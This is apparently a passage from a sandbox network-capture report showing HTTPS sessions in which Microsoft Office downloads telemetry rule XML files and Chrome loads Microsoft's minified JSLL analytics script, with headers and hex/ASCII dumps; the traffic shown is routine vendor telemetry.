                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  107192.168.2.74983613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:08 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                  x-ms-request-id: 9613c870-301e-0052-532e-3d65d6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185309Z-178bfbc474bv7whqhC1NYC1fg400000004w0000000009ncg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:09 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  108192.168.2.74983713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:08 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1352
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                  x-ms-request-id: 731b5b9c-601e-0001-6b71-3cfaeb000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185309Z-174c587ffdfn4nhwhC1TEB2nbc00000003bg00000000gbkf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:09 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  109192.168.2.74983813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:08 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1368
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                  x-ms-request-id: fb424ae8-401e-0015-5d91-3d0e8d000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185309Z-15b8b599d88wn9hhhC1TEBry0g000000039000000000mpy3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:09 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  110192.168.2.74984013.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:09 UTC606OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                  Host: js.monitor.azure.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  Range: bytes=195712-195712
                                                                                                                                                                                  If-Range: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  2024-11-23 18:53:10 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:10 GMT
                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                  Content-Length: 207935
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                  Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                  x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  x-azure-ref: 20241123T185310Z-178bfbc474bw8bwphC1NYC38b400000004m000000000hpbt
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:10 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                  Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                  Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                  Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                  Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                  Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                  Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                  Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                  Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                  2024-11-23 18:53:10 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                  Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                  2024-11-23 18:53:11 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                  Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  111192.168.2.74984513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:10 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:10 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1364
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE1223606"
                                                                                                                                                                                  x-ms-request-id: 45806a8e-701e-003e-807c-3b79b3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
